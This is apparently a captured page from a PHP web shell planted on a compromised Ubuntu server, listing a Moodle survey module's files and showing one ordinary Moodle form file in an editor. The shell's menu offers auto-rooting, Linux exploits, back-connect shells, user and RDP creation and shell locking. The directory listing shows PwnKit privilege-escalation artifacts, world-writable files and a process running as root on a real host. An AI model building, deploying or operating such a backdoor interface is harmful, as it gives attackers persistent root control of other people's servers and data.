Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
mod /
survey /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
download.php
13.34
KB
-rwxrwxrwx
graph.php
28.6
KB
-rwxrwxrwx
index.php
2.8
KB
-rwxrwxrwx
lib.php
25.15
KB
-rwxrwxrwx
mod_form.php
1.72
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
report.php
19.67
KB
-rwxrwxrwx
save.php
3.73
KB
-rwxrwxrwx
styles.css
696
B
-rwxrwxrwx
survey.js
980
B
-rwxrwxrwx
version.php
1.19
KB
-rwxrwxrwx
view.php
7.91
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_form.php
<?php if (!defined('MOODLE_INTERNAL')) { die('Direct access to this script is forbidden.'); /// It must be included from a Moodle page } require_once ($CFG->dirroot.'/course/moodleform_mod.php'); class mod_survey_mod_form extends moodleform_mod { function definition() { global $CFG, $DB; $mform =& $this->_form; $strrequired = get_string('required'); //------------------------------------------------------------------------------- $mform->addElement('header', 'general', get_string('general', 'form')); $mform->addElement('text', 'name', get_string('name'), array('size'=>'64')); if (!empty($CFG->formatstringstriptags)) { $mform->setType('name', PARAM_TEXT); } else { $mform->setType('name', PARAM_CLEANHTML); } $mform->addRule('name', null, 'required', null, 'client'); if (!$options = $DB->get_records_menu("survey", array("template"=>0), "name", "id, name")) { print_error('cannotfindsurveytmpt', 'survey'); } foreach ($options as $id => $name) { $options[$id] = get_string($name, "survey"); } $options = array(''=>get_string('choose').'...') + $options; $mform->addElement('select', 'template', get_string("surveytype", "survey"), $options); $mform->addRule('template', $strrequired, 'required', null, 'client'); $mform->addHelpButton('template', 'surveytype', 'survey'); $this->add_intro_editor(false, get_string('customintro', 'survey')); $this->standard_coursemodule_elements(); //------------------------------------------------------------------------------- // buttons $this->add_action_buttons(); } }
Close